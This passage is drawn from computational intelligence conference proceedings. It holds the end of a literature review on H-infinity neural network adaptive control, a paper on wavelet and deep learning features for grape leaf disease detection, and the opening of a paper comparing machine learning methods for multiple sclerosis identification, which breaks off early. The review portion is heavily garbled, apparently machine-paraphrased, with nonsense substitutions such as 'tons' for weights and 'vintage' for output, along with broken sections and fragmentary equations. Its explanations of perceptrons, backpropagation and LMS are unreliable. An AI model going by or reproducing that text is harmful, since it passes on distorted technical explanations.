Rosenblatt urbanized perceptron since subsequently form to accomplish
“learning.” Rosenblatt new trial as well as error method plus interconnected percep-
trons haphazardly to modify weights [9]. The recovered representation for electro-
chemical system is copy framed through McCulloch in addition Pitts.’ This nerve cell
by premise popular arena of contemporary nocturnal neural grids [16]. Perceptron
appears to look like neuron however perceptron likeness ensures non validate intricate
electrochemical trials which in fact depart on inside a nerve cell. Nerve cell works
identical a voltage-to-recurrence interpreter for motive that of electrochemical tech-
nique of a nerve cell. Neuron proclamations for reason that of compound response
A Literature Review on H∞ Neural Network … 343
when specific edge is work by neuron, at that point conflagration advanced recur-
rence. While superior contribution approach interested in neuron although enormity
of yield commencing neuron is alike [14]. Tremendously, straightforward numerical
portrayal of neuron is perceptron.
In light of limiting error squared and accepting an ideal reaction existed, a slope
seek approach was executed. Later that scheming is acknowledged as least mean
squares (LMS). Concluded latest link of centuries LMS in addition subject arrays are
mostly operated in a variety of uses. Aimed at restrictive error scientific technique
was given. By inclination seek strategy, experimentation process is not learning.
Weight break thought to perceptron was conveyed by means of Selfridge [2, 3]. If
exhibition did not develop, plus another asymmetrical course vector stayed elected.
The directly above stands technique that is eluded by way of mounting elevation.
Subsequently, vivacity by restricted it is eluded as diving proceeding inclination. A
scientific technique was twisted aimed at altering tons via Nguyen in addition Hoff
[6].
Back propagation re-experienced without restrictions. N−1 node neural organiza-
tion might build along with equipped via concocting perceptrons in multilayer array.
The loads to facilitate in beginning by means of output layer loads are balanced
by back propagation. Representation of perceptron is capable of changing by back
propagation estimation utilizing sigmoidal capacity like squashing capacity. Signum
work was utilized by perceptron of prior forms. Sigmoidal capacity is differentiable
wherever signum work has constructive position headed for enable neural system near
merge just before a neighboring least. Slope statistics can switch operating nonlinear
censorship dimensions through back propagation intention. Angle records can switch
exploiting nonlinear censorship dimensions next to back propagation algorithm an
incredible wellspring of restored prototypical for electrochemical system by proto-
typical framed through McCulloch in addition Pitts’. During field of neural systems
meeting credentials be generally excellent. Around 25 years prior brilliant time
system examine ended. Currently, investigation from place to place here being re-
invigorated subsequently disclosure back propagation. Connection being exploited
feed-forward neuronal scheme in addition to frequent commentators utilized. Neural
system determination be foundation of effort finished in investigation in favor of
feed-forward neural system along with back propagation set of rules.
Among censorship capacity normally sigmoidal capacity, feed forward neural system
be a system perceptrons. Utilizing limiting error squared, back propagation algorithm
modifies weights [7]. For changing loads over numerous concealed films back prop-
agation algorithm permits differentiable censorship capacity. In direction of modify
loads n-distinct issues be able to illuminated. Select OR plus XOR question be
capable of unraveled by containing numerous nodes on each level. Starting contribu-
tion to output feed-forward neural system is associated in addition to on contiguous
344 P. Kashyap
layers every node be associated with each joint. The yield as of an earlier layer be
contribution to hub if hub be lying on yield layer plus contribution toward neural
organization being influence to pivot. On way to formulate neural organization vital
is pivot. To set up neural framework key is hub. On double, heaps of one individual
hub can be distorted by altering heaps using back inducing figuring. Scheduled inter-
pretation of an introverted output, reasonable formulating progression ends awake
plausible through neural organization, by unscrambling neuronal arrangement toward
nodes. For invigorating tons, back propagation algorithm be an LMS-as computation
[15].
All through preparation procedure at second layer of hubs primary layer yields
obtain figure up awaiting yield approach closer commencing neural system progres-
sion. The inaccuracy is determined through looking at wanted yield by genuine
vintage.
Subsequently vintage instigates since vintage pivot aimed at revising tons fashion-
able inverse over neuronal organization, fault being exploited. Unity insufficiency
heft modification ailment being tons of extensive number of pivots same deposit
cannot be correspondent, in light of fact that tons would be well-adjusted through
weight aimed at each single hub that partakes indistinguishable tons on individ-
ually sheet. One deficiency weight modification ailment being tons of substantial
quantity of nodes scheduled a parallel sheet cannot stay correspondent, in light of
fact that loads balanced among weight for each node partakes indistinguishable tons
arranged individually layer. Scheduled apiece sheet loads balanced, but mainstream
of neuronal organization’s tons stayed at initial established at zero. Alike scientific
prototypical is partaking apiece sheet a solitary node.
To look through weight space appropriately, introducing tons chaotically being
supplementary motive. The capriciously instated tons style it enormously stiff to
assess fundamental presentation of controller outline.
Input (or intermittent or intelligent) systems can have sign going in the two orientation
by exhibiting circles in the system. Criticism systems are unimaginable and can get
exceptionally jumbled. Figuring got from before information are supported again
into the system, which gives them a kind of memory. Input systems are dynamic;
their ‘state’ is changing perpetually until they accomplish a concordance point. They
remain at the agreement point until the information changes and another equalization
ought to be found.
For instance, of feedback network, I can review Hopfield’s network. The primary
utilization of Hopfield’s network is as affiliated memory. An associative memory is
a device which acknowledges an information design and creates a output as the put
away example which is most intently connected with the info. The capacity of the
partner memory is to review the comparing put away example, and after that produce a
reasonable form of the example at the yield. Hopfield networks are ordinarily utilized
A Literature Review on H∞ Neural Network … 345
for those issues with binary example vectors and the information example might be
an uproarious variant of one of the put away examples. In the Hopfield network, the
put away examples are encoded as the weights of network.
3 Adaptive Controllers
controller plant ∑
A Literature Review on H∞ Neural Network … 347
controller plant ∑
+
on its past output. Henceforth, with incorporation of past sources of info and output,
the guess capacity of a RNN is viewed as much superior to that of an MLP.
The nuts and bolts of counterfeit neural systems are all around clarified by
Simon Haykin in Neural systems [7, 8]. Independent of design, pursue preparing and
approval as two separate stages. At the point when system is occasionally refreshed
to get dynamically better comprehension of plant although plant being functioning,
it is called ‘on the web’ prepared. The system is called ‘on the web’ prepared when
preparation and the utilization (or approval) stages are isolated in time.
Neural systems have been utilized for framework recognizable proof and control
of different plants, for example, modern robots’ business and warrior airplane, autos,
control age, engines and drives and compound procedure [4]. Werbos has grouped
neural systems for control into five general classes, to be specific:
1. Supervisory controller,
2. Inverse controller,
3. Adaptive controller,
4. Back propagation with utility,
5. Adaptive critic-based controller (Fig. 3).
The most straightforward type of neural system controller is of the supervisory
sort. Here, a system figures out how to mirror another controller (manager) via
preparing with info and yield information from the parent controller. This is regularly
portrayed as a strategy which mimics the conduct of someone else or a framework.
For the most part, supervisory neuronal controller ensures precisely as human master
uncertainty worse. In any case, in a large portion of cases this technique utilizes an
4 H∞ Controller
The “infinity” in H∞ means that this type of control is designed to impose minimax
confine in the sense of decision theory in the frequency domain. The fundamental
delinquent of H∞ control scheme approximately is to augment (by high-quality of
compensator in a typical feedback conformation) some most terrible instance (i.e.,
infinity norm) degree of performance despite fact keeping steadiness [14].
In H∞ control, we contemplate the following closed loop system representation
with an “extended system”:
• w is an exogenous input (m1 × 1) containing at least the reference signal r and
possibly other exogenous signal such as a noise model n.
• z is the performance output (p1 × 1) a virtual output signal only used for design.
• ũ is the control input (m2 × 1), computed by the controller C(s). ỹ is the measured
output (p2 × 1), available to the controller C(s) (Fig. 4).
u y
C(s)
350 P. Kashyap
To achieve robust adaptive control, we require not only identify the nominal plant,
but also quantify the model uncertainty in the adaptive modeling part. Moreover, we
need use both the nominal plant model and the measuring of the model uncertainty
to self-tune the adaptive control law based on H∞ , robust control. The problem is the
equivalence of the two least-squares algorithm, and/or under what conditions they
are equivalent.
An obvious complication for the unification of identification and control in H∞
is the deficit of recursive algorithms using real time data. It is possible to transmute
the frequency domain least-squares algorithm into the time domain one [13].
The use of H∞ control for the control part also gives the opportunity to implement
the resulting control law adaptively because H∞ norm is induced two norms (i.e.,
the size of energy). This is also manifested by the H∞ performance index in time
domain [14]. The problem is clearly the computational complexity associated with
H∞ design that prohibits its implementation in real time. Recall that we do not know
the true system except the identified model that is a function of time t. Thus, the H∞
controller needs to be designed for each identified plant that is simply not possible
for real time implementation. A periodic signal is injected that ensures the persistent
excitation at the plant input.
Then it can be shown that the least-squares algorithm in frequency domain is
equivalent to a specialized recursive least-squares algorithm asymptotically [16].
Fortunately, the amplitude of the periodical signal is not large that keeps the resulting
performance degradation small. Second, the time domain performance index is used
to convert the infinite horizon problem for H∞ control into the finite horizon problem
at each time instance. In this case the two algebraic Riccati equations involved in
H∞ control become Riccati difference equations that can be solved recursively, and
thus allow the real time accomplishment of the robust model reference control.
Under certain conditions, the finite perspective H∞ control converges to infinite
perspective H∞ control [15]. Hence, robust adaptive control can be achieved. Because
the identified model is very inaccurate at the early stage of adaptive control, model
validation is employed to monitor the closed loop system. If the system produces
undesirable size of signals, the H∞ controller designed for finite horizon case must
be shut off. This prevents the system from suffering extremely poor performance
(Fig. 5).
6 Stability Analysis
ẋ = Ax + Bu + D f (x) (1)
A Literature Review on H∞ Neural Network … 351
Identified model
+
Adjustable law
(15 degree)
Adjustable law
controller
u n = −K x x + K r r (4)
ẋm = Am x + Bm r (5)
u = u n − u ad (6)
352 P. Kashyap
wherever uad will defined in a, while. Concerning this controller act to system
dynamics, we redraft scheme dynamics as
(8)
ė = Am e + Bu ad + Dw(t) (11)
ẋe = Ae X e + Be [e w]T
u ad = Ce X e + De [e w]T (12)
7 Conclusions
In this work, a broad writing study is directed for the H∞ adaptive control design
utilizing neural systems for frameworks identified with control frameworks. Different
models are talked about in detail and its reasonableness for explicit application
is featured. A neuronal scheme H∞ adaptive controller engineering being deter-
mined that enables a control architect to tune orientation model following qualities
through straight control structure methods, band limit adaptive control sign, also
treat un-coordinated ambiguity a solitary plan construction for frameworks through
an obscure nonlinearity.
Neural systems can be considered as nonlinear capacity approximating instru-
ments (i.e., straight blends of nonlinear premise capacities), where the parameters
of the systems ought to be found by applying streamlining strategies. The advance-
ment is finished concerning the estimate error measure. When all is said in done it
is sufficient to have a solitary concealed layer neural system (MLP, RBF or other)
to gain proficiency with the guess of a nonlinear capacity. In such cases, general
enhancement can be connected to discover the change rules for the synaptic loads.
References
1. Narendra, K. S., & Parthasarathy, K. (1990). Identification and control of dynamical systems
using neural networks. IEEE Transactions on Neural Networks, 1(1), 4–27.
2. Greene, M. E., & Tan, H. (1991). Indirect adaptive control of a two-link robot arm using
regularization neural networks. In Proceedings of the International Conference on Industrial
Electronics, Control and Instrumentation (Vol. 2, pp. 952,135).
3. Tanomaru, J., & Omatu, S. (1991). On the application of neural networks to control and inverted
pendulum: An overview. In Proceedings of the 30th SICE.
4. Jin, Y., Pipe, T., & Winfield, A. (1993). Stable neural network control for manipulators.
Intelligent Systems Engineering, 2(4), 213–222.
5. Brown, R. H., Ruchti, T. L., & Feng, X. (1993). Artificial neural network identification of
partially known + dynamic nonlinear systems. In Proceedings of 32nd Conference on Decision
and Control (Vol. 4, pp. 3694–3699).
6. Nordgren, R. E., & Meckl, P. H. (1993). An analytical comparison of a neural network and a
model-based adaptive controller. IEEE Transactions on Neural Networks, 4(4), 685–694.
7. Yao, B., & Tomizuka, M. (2001). Adaptive robust control of MIMO nonlinear systems in
semi-strict feedback forms. Automatic, 37(9), 1305–1321.
8. Khalil, H. K. (2002). Nonlinear systems. Prentice Hall.
9. Hoagg, J. B., & Bernstein, D. S. (2004). Direct adaptive dynamic compensation for minimum
phase systems with unknown relative degree. In Proceedings of 43rd IEEE Conference on CDC
Decision and Control (Vol. 1, pp. 183–188).
354 P. Kashyap
10. Lavretsky, E., & Hovakimyan, N. (2005). Adaptive compensation of control dependent
modeling uncertainties using time-scale separation. In Proceedings and 44th IEEE Conference
on 2005 European Control Conference Decision and Control CDC-ECC ’05 (pp. 2230–2235),
12–15 December 2005.
11. Volyanskyy, K. Y., Calise, A. J., & Yang, B. J. (2006). A novel q-modification term for adaptive
control. In American Control Conference (p. 5).
12. Cao, C., & Hovakimyan, N. (2006). Design and analysis of a novel l1 adaptive controller,
part1: Control signal and asymptotic stability. In Proceedings of American Control Conference
(pp. 3397–3402), 14–16 June 2006
13. Yu B, Shi Y, Huang J. Ste p tracking control with disturbance rejection for networked control
systems with random time delays. Proceedings of the Joint 48th IEEE Coreference on Decision
and Control and 28th Chinese Control Conference, Shanghai, China, 2009; 4951–4956.
14. Chadli, M., & Guerra, T. M. (2012). LMI solution for robust static output feedback control of
discere Takagi-Sugeno mode ls. IEEE Transactions on Fuzzy Systems, 20(6), 1160–1165.
15. Wu, Z.-G., Shi, P., Su, H., & Chu, J. (2013). Network-based robust passive control for fuzzy
systems with randomly occurring uncertainties. IEEE Transactions on Fuzzy Systems, 21(5),
966–971.
16. Bouarar, T., Guelton, K., & Manamanni N. (2013). Robust non-quadratic static output feed-
back controller design for Takagi-Sugeno systems using descriptor redundancy. Engineering
Applications of Artificial Intelligence, 26(2), 739–756.
A Novel DWT and Deep Learning Based
Feature Extraction Technique for Plant
Disease Identification
1 Introduction
The agriculture sector contributes majorly in the income sources of India and hence
the contribution of agriculture sector in the national economy is indisputable. The thir-
teen percent of the GDP contribution is depending on agricultural sector. However,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 355
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_29
356 Kirti et al.
the diseases caused by various pathogens to the plants ruins the yield up to 20–40%.
The grape vines are one of the key founts of the agricultural and vine industries. The
quantity and quality of vines should be up to the mark of the market standards.
The detection of diseases in plants often mis-calculated when the manual detection
is used and hence there is a need of such automated systems which can detect the
diseases with the least number of manual interventions [1]. One of the main issues
in disease detection is the similarity in the symptoms of different diseases. It is
very hard to differentiate one disease from another disease [2]. So, the emphasis
should be more on feature extraction part of the system. The significant features
provide high-accurate system. Han and Shi computed the features using HSV, Lab
and YCbCr models which provided 91.3% accuracy with support vector machine
(SVM) and deep convolutional networks (DCNNs) [3]. Linear and quadratic local
binary patterns were used by Veerashetty and Patil for creating a feature vector which
was invariant to the rotation, illumination and scaling changes. The accuracy of 95%
was computed with multi-Kernel SVM classifier [4]. Thanjavur used DWT, SIFT
and GLCM features for detection of diseases in paddy fields. The system achieved
96.83% classification accuracy with KNN, ANN, NB and Multi SVM [5].
A system with color and grayscale information features was developed by Ghazal
and Mahmoud which used the pre-determined region of interest (ROI) pixels for the
objective of determining the probabilities for the pixels. The labels were fined with
Gauss-Markov random field model. The dice similarity coefficient has provided
the recognition rate of 90% [6]. Xio and Ma extracted the 21 features for the
processing which included the features based on color, texture and morphology.
Principal component analysis (PCA) was utilized for the purpose of reducing the
dimensionality. The classification accuracy was obtained as 95.63% with SVM and
back-propagation neural networks (BPNNs) [7]. The system developed by Ma and
Du used conventional as well as deep learning classifiers. The features extracted
for conventional classifiers were the average, contrast, correlation, energy, etc. from
different channels of different color models. The highest accuracy obtained using
SVM, random forest and AlexNet was 93.4% [8]. Hassanein and Gaber developed
a system for tomato disease detection which extracted the features using Gabor
Transforms and the feature selection process was done using the moth flame opti-
mization and rough set. The accuracy of 90.5% was achieved using KNN and SVM
[9]. Okra and Bitter gourd diseases were detected by Mondal and Kole using an
entropy discretization Method. Correlation coefficient was computed and provided a
recognition rate of 96.78% [10]. Yao and Chen developed a system which employed
the HOG, Gabor and LBP for feature extraction and provided an accuracy of 90.7%
[11]. The textural features LBP, CLBP and LTP was used by Kirti to detect the leaf
scorch disease in the strawberry plant. The comparison among all the three-feature
extraction technique was made on the basis of the accuracy computed by SVM Clas-
sifier. The highest accuracy achieved was 97.60% [12]. Revathi and Hemlata utilized
the swarm optimization in combination with SVM, BPN and fuzzy logic to detect the
disease in cotton plants which achieved an accuracy of 94% [13]. Zhou and Kaneko
detected foliar disease in Sugar Beet by using three features in combination with
A Novel DWT and Deep Learning Based … 357
L*a*b* color model and classified the images using SVM and template matching.
The algorithm provided an accuracy of 97.44% [14].
The residual work is organized in the subsequent way. The preliminary descrip-
tion, block diagram and the algorithm description for the proposed novel DWT-DNN
technique along with the process of selection of the best decomposition level and
sub-band selection is explained in Sect. 2. Description about the dataset and system
specifications are mentioned in Sect. 3 along with the comparison graphs of perfor-
mance among 2 wavelets for level and sub-band selections are presented. The results
are discussed in the same section. The conclusion is presented in Sect. 4.
In this section, the preliminary description of robust features extraction large scale
based on DWT, PCA based large scale RGB feature extraction and deep learning
based classification technique for plant disease identification is presented.
The colored images (R, G, B individual channels) of plant leaves were decomposed
up to four levels. Since, the decomposition of the image is proven to be the best
alternative to determine the high-detail features and it also provides scale-invariant
interpretation of the leaf image. Discrete wavelet transform (DWT) is employed
aimed at the investigation of different sub bands that can help in excluding out
the significant distinct features of the leaves efficiently for the disease detection.
Images were broken down into 4 different coefficients, as illustrated in Fig. 1, which
are high frequency and low frequency (in three directions) in nature. The DWT
(dwt (z)) is attained by exploitation of the function (s(z)) which is also called as
the scaling function and the function (w(z)) which represents the wavelet in Eq. 1
at decomposition level d:
d d
dwt(z) = ld (x)0.2 2 s 2d z − x + h d (x)0.2 2 w 2d z − x (1)
x x
As discussed above, the dimensionality of colored plant image features was very
high. After performing DWT and selecting large scale coefficients, there was a need
to reduce the feature sub-space, as it has been observed that computational time
A Novel DWT and Deep Learning Based … 359
of CPU was still very high. The processor was unable to handle a high amount of
processing of large sized dataset features. Therefore, principal component analysis
was utilized for reducing the size of training and test features of image space. The
main concept in the process of determining the PCA consists of the reduction of
dimensionality present in the input dataset which may contain a very high number of
interrelated components, while obtaining significant number of variations existing
in it. The above-mentioned task is done by converting the image as a linear vector
weights by transforming it into a single-dimensional column vector. The space of
training i = [1 . . . I ] represents the training images as column vectors IMi=[1...I ]
integrated to create a 2D matrix and subtracted from the mean
m of all image vectors.
The reduction in dimension was done using the concept K × K N × N with
the covariance matrix K × K as shown in Eq. 2. This space was called as the reduced
sub-space and provided the Eigen vectors corresponding to the Eigen values which
were normalized which were used to form a projection between the sub-spaces of
the training and testing sets. The classification is performed by pre-trained DNNs.
I
Cm = (m − IMi ).(m − IMi )T (2)
i=1
The importance of classification phase is one of the crucial steps in disease detection
system since in this phase the system assigns the class labels to the test images and
compute the validation accuracy. The deep neural networks are excellent in handling
the large sized datasets to obtain the significant features and provides better accuracy
and results than other classifiers. These are applied using transfer learning and fine-
tuned for the desired system. It automatically learns the robustness hidden in the
variations of the input dataset. The six types of pre-trained deep neural networks
architectures are utilized to form feature vector formulation and classification, i.e.,
AlexNet, GoogleNet, ResNet-50, ResNet-101, Inception V3 and Xception [18]. The
pre-trained models are selected on the basis of the increment in accuracy and number
of parameters. These architectures were pre-trained on ImageNet database which
contains millions of images of 1000 different classes objects and the class weights
that are trained using the previous problems, used for the system and fine-tuned
according to the problem.
360 Kirti et al.
The proposed novel technique based on DWT and deep learning designed for extrac-
tion of the features and classification for identification of diseases in plants mentioned
below incorporates multi-resolution analysis of the images, dimensionality reduc-
tion process and the feature vector formulation and classification which can help in
improving the accuracy of the system, illustrated in Fig. 2. The algorithm description
is mentioned as:
1. The RGB images were loaded into the system and passed for the processing.
2. The R, G and B channels were separated out of the image.
3. The images obtained were decomposed up to 4 levels.
4. The multi-resolution analysis of the images was done using 2 wavelets, i.e., db4
and bior 1.5.
5. The dimensionality reduction process was then applied on the computed
coefficients by applying principal component analysis.
6. The R, G and B components were then concatenated to obtain a single RGB
image which was then passed into 6 types of DNNs.
7. Accuracy was computed with each DNN for every sub band and decomposition
level.
Fig. 2 Proposed novel DWT and deep learning based feature extraction technique for plant disease
identification
A Novel DWT and Deep Learning Based … 361
Fig. 3 Plant village dataset contained grape vine leaves: a healthy, b affected from black rot disease,
c affected from Esca (Black Measles), d affected from leaf blight disease (Isariopsis Leaf Spot)
In this section, the details about the dataset and the system specifications are provided.
The results between the two wavelets for the selection of level and sub-band selection
are discussed.
3.1 Dataset
The grape dataset from plant village database was used for the work [19]. The dataset
contained a total of 1600 RGB/color images that were used, consisted of 400 images
in each class. There were 4 distinct classes. The first class was labeled as the healthy
class and the remaining 3 classes were the ones with the images of diseased leaves.
The 3 diseases affected the grape leaves were black rot disease, Esca (Black Measles)
disease and the leaf blight (Isariopsis Leaf Spot). The images were in.jpeg format
with a resolution of 256 × 256 pixels. The images seemed to be captured with a
monochrome background with no complexities as demonstrated in Fig. 3.
A system with 8 GB RAM, 2 GHz clock speed, 64-bit Intel core i7 was used for the
experiments. The processing is done with MatLab 2020 installed with the system.
The 2 types of experiments are done on the basis of wavelets.
362 Kirti et al.
The images obtained from the concatenation of all the components (R, G, B) were
then passed to the next stage where the DNNs are applied to do the further processing.
Accuracy was computed for different decomposition levels with different sub bands
and DNNs. The highest accuracy achieved by db4 with level 1 decomposition was
with the Inception V3 DNN at the cH sub band, i.e., 98.96%, with level 2 decom-
position was with the ResNet 101 DNN at the cA sub band, i.e., 98.13%, with level
3 decomposition was with the Inception V3 DNN at the cA sub band, i.e., 97.92%,
with level 4 decomposition was with the ResNet 50 & ResNet 101 DNN at the cA
sub band, i.e., 97.08%.
The second wavelet used in multi-resolution analysis was the biorthogonal
wavelet. The version bior 1.5 was applied on the images and further decomposi-
tion levels. The highest accuracy achieved with level 1 decomposition was with the
Inception V3 DNN at the cA and cD sub band, i.e., 98.96%, with level 2 decompo-
sition was with the ResNet 101 DNN at the cV sub band, i.e., 98.54%, with level
3 decomposition is with the Inception V3 DNN at the cD sub band, i.e., 98.54%,
with level 4 decomposition was with the Inception V3 DNN at the cV sub band, i.e.,
97.29%.
The system with db4 wavelet provided the highest accuracy of 98.96% when
compared with every sub band with each decomposition level. The cH sub band and
the decomposition level 1 was found to have the most significant features which can
provide the highest accuracy. The system with bior 1.5 wavelet provided the highest
accuracy of 98.96% when compared with every sub band with each decomposition
level. The cD sub band and the decomposition level 1 was found to have the most
significant features which can provide the highest accuracy, as shown in Fig. 4.
The comparison of accuracy between the wavelets db4 and bior 1.5 was made to
determine the best decomposition level and sub bands.
It had been found that the Level 1 decomposition was proven to be the best
decomposition level where the system provided the best accuracy of 98.96%, as
shown in Fig. 5. The other comparison was done between db4 and bior 1.5 wavelets
to determine the best sub band. It had been found that the cA sub band was proven
to be the best decomposition level where the system provided the best accuracy of
98.80%. The wavelet db4 was determined to be the best for the particular system as
it provided the highest accuracy among both the wavelets, i.e., 98.96%.
A Novel DWT and Deep Learning Based … 363
Fig. 4 Comparison of accuracy among sub band and level with a db4 wavelet, b bior1.5 wavelet
364 Kirti et al.
Fig. 5 Performance comparison between db4 wavelet and bior1.5 wavelet for a sub-band selection
and, b decomposition level selection
A Novel DWT and Deep Learning Based … 365
Table 1 Accuracy
Approaches Accuracy (%)
comparison of performance
among the current approaches Ghazal and Mahmoud et al. [6] 90
and proposed approach Hassanein and Gaber et al. [9] 90.5
Yao and Chen et al. [11] 90.7
Han and Shi et al. [3] 91.3
Ma and Du et al. [8] 93.4
Veerashetty and Patil et al. [4] 95
Xio and Ma et al. [7] 95.83
Mondal and Kole et al. [10] 96.78
Thanjavur et al. [5] 98.63
DWT-DNN (Proposed approach) 98.96
The comparison between different approaches was made on the basis of the highest
accuracy achieved as shown in Table 1. The colored images were used in the proposed
approach while the other approaches converted the images into gray-scale images
for easy computation. The other approaches used the only available resolution of
the images, but the proposed approach used the multi-resolution analysis to deter-
mine the best level at which the least memory was required by the system to process
the images. The system performed well with no high-end GPU installed in it. The
other approaches used the SVM, KNN, decision trees and other classification tech-
niques which proved to be lesser accurate in comparison with the proposed approach
classification techniques, i.e., DNNs.
It was observed that the proposed approach produced the highest accuracy among
the existing approaches, i.e., 98.96% as demonstrated in Fig. 6.
4 Conclusion
suited for the system. The db4 wavelet performed better than the bior 1.5 wavelet.
The accuracy achieved by the system was 98.96%. The system handled large dataset
very efficiently, whereas the existing Machine learning techniques could not perform
well with large datasets. In future, different families of wavelets will be explored and
examined using different datasets for plant disease identification.
References
1. Giraddi, S., Desai, S., & Deshpande, A. (2020). Deep learning for agricultural plant disease
detection. In lecture notes in electrical engineering (pp 864–871). Springer.
2. Bisen, D. (2020). Deep convolutional neural network based plant species recognition through
features of leaf. Multimed Tools Applications 1–14. https://doi.org/10.1007/s11042-020-100
38-w.
3. Han, J., Shi, L., Yang, Q., et al. (2020). Real-time detection of rice phenology through convo-
lutional neural network using handheld camera images. Precision Agriculture. https://doi.org/
10.1007/s11119-020-09734-2
4. Veerashetty, S., & Patil, N. B. (2020). Novel LBP based texture descriptor for rotation, illumina-
tion and scale invariance for image texture analysis and classification using multi-kernel SVM.
Multimed Tools Applications, 79, 9935–9955. https://doi.org/10.1007/s11042-019-7345-6
5. Gayathri Devi, T., & Neelamegam, P. (2019). Image processing based rice plant leaves diseases
in Thanjavur, Tamilnadu. Cluster Computing, 22, 13415–13428. https://doi.org/10.1007/s10
586-018-1949-x
6. Ghazal, M., Mahmoud, A., Shalaby, A., El-Baz, A. (2019). Automated framework for accu-
rate segmentation of leaf images for plant health assessment. Environmental Monitoring and
Assessment, 191. https://doi.org/10.1007/s10661-019-7615-9
7. Xiao, M., Ma, Y., Feng, Z., et al. (2018). Rice blast recognition based on principal component
analysis and neural network. Computers and Electronics in Agriculture, 154, 482–490. https://
doi.org/10.1016/j.compag.2018.08.028
A Novel DWT and Deep Learning Based … 367
8. Ma, J., Du, K., Zheng, F., et al. (2018). A recognition method for cucumber diseases using leaf
symptom images based on deep convolutional neural network. Computers and Electronics in
Agriculture, 154, 18–24. https://doi.org/10.1016/j.compag.2018.08.048
9. Hassanien, A. E., Gaber, T., Mokhtar, U., & Hefny, H. (2017). An improved moth flame
optimization algorithm based on rough sets for tomato diseases detection. Computers and
Electronics in Agriculture, 136, 86–96. https://doi.org/10.1016/j.compag.2017.02.026
10. Mondal, D., Kole, D. K., & Roy, K. (2017). Gradation of yellow mosaic virus disease of okra
and bitter gourd based on entropy based binning and Naive Bayes classifier after identification
of leaves. Computers and Electronics in Agriculture, 142, 485–493. https://doi.org/10.1016/j.
compag.2017.11.024
11. Yao, Q., Chen. G. te, Wang, Z., et al. (2017). Automated detection and identification of white-
backed planthoppers in paddy fields using image processing. Journal of Integrative Agriculture,
16, 1547–1557. https://doi.org/10.1016/S2095-3119(16)61497-1
12. Kirti, Rajpal, N., & Arora, M. (2021). Comparison of texture based feature extraction tech-
niques for detecting leaf scorch in strawberry plant (Fragaria × Ananassa). In A. Kumar, S.
Mozar (Eds.), Lecture notes in electrical engineering. ICCCE 2020. Lecture Notes in Electrical
Engineering (Vol. 698, pp 659–670). Springer.
13. Revathi, P., & Hemalatha, M. (2014). Cotton leaf spot diseases detection utilizing feature
selection with skew divergence method. International Journal of Science, Engineering and
Technology, 3, 22–30.
14. Zhou, R., Kaneko, S., Tanaka, F., et al. (2015). Image-based field monitoring of Cercospora
leaf spot in sugar beet by robust template matching and pattern recognition. Computers and
Electronics in Agriculture, 116, 65–79. https://doi.org/10.1016/j.compag.2015.05.020
15. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent & Fuzzy Systems, 35, 5265–5277. https://doi.org/10.3233/JIFS-169810
16. Yadav, J., Rajpal, N., & Vishwakarma, V. (2016) Face recognition using Symlet, PCA and
Cosine angle distance measure. In 2016 Ninth International Conference on Contemporary
Computing (IC3), Noida, U.P.
17. Yadav, J., Rajpal, N., & Mehta. R. (2019). An improved illumination normalization and robust
feature extraction technique for face recognition under varying illuminations. Arabian Journal
for Science and Engineering, 44, 9067–9086.
18. Lumini, A., & Nanni, L. (2019). Deep learning and transfer learning features for plankton
classification. Ecological Informatics, 51, 33–43. https://doi.org/10.1016/j.ecoinf.2019.02.007
19. GitHub—spMohanty/PlantVillage-Dataset: Dataset of diseased plant leaf images and corre-
sponding labels. https://github.com/spMohanty/PlantVillage-Dataset. Accessed 11 December
2020
Supervised and Unsupervised Machine
Learning Techniques for Multiple
Sclerosis Identification: A Performance
Comparative Analysis
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 369
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_30
370 S. Jain et al.
1 Introduction
Multiple sclerosis is a disseminating illness, in which the immune system of the body
is severely affected, and the antibodies are directly attacked and cause communica-
tion breakdown between brain and other parts of the body. Eventually, the disorder
originates lifelong damage or worsening of the veins. Multiple sclerosis indication
includes: pain, fatigue, lack of coordination between brain and other parts of the
body. Various researchers are working in the domain of MSD identification segmen-
tation as well as classification of MS lesion in brain MR image. Machine learning
performance is good in identification and segmentation task of brain MR images to
find neurological diseases like a tumor, MSD, Alzheimer’s disease, etc.
In 2018, a GLCM-based classification of brain MR image using feed-forward
neural network has been proposed with 10 folds cross-validation with an accuracy
of 92.75% [1]. Using Adaboost with random forest-based classification on different
datasets using two-dimensional discrete wavelet transform for feature extraction and
probabilistic principal component analysis (PPCA) for dimensionality reduction has
been suggested by [2]. In 2009, Haar wavelet transform along with PCA has been
proposed by [3]. A multilayer perceptron along with modified Jaya algorithm has
been proposed by [4]. In 2016, KPCA (kernel PCA) with bioorthogonal wavelet along
with logistic regression has been proposed by [5]. In 2018, a convolution neural
network with dropout approach was given by [6]. MS patient characterization using
support vector machine with an accuracy of 89.2% was given by Zurita et al. [7].
A threshold-based approach for the segmentation task of multiple sclerosis brain
magnetic resonance image was given by Valcarcel et al. [8]. An automated technique
for the identification and segmentation of MS lesion has been given by Roy et al.
[9]. Different approach for the identification and segmentation of MS lesion and the
classification of healthy brain MR image from unhealthy brain has been given by
[10]. The above literature highlights the fact that different machine learning tech-
niques have been utilized successfully for MSD identification on brain MR images.
However, in order to compare and analyze performance of various supervised and
unsupervised machine learning techniques for MSD identification, a reinvestigation
has been carried out using distinct performance metrics on brain MR images. The
key points in this work are mentioned as:
1. Eighteen textural features are utilized on brain MR image for generating feature
vector and fed to KNN, SVM, ensemble-based classifier and K-mean, Gaussian
mixture model (GMM)-based clustering model.
2. The results of three classifiers and two clustering techniques on different param-
eters for MSD identification has been tested to find the best accuracy on e-health
dataset [11–15] and private clinical dataset [16].
3. Observed results are examined and matched with other techniques.
The paper is resumed as follows. Section 2 gives the thorough explanation of given
approach, and brief overview of techniques has been addressed. Section 3 gives the
experimental results, and Sect. 4 presents the conclusion.
Supervised and Unsupervised Machine Learning Techniques … 371
2 Proposed Approach
Firstly, the skull part of brain magnetic resonance images in both the training and
test dataset has been extracted using adobe illustrator software. All the images in the
training and test dataset have been resized into 64 × 64 using bilinear interpolation.
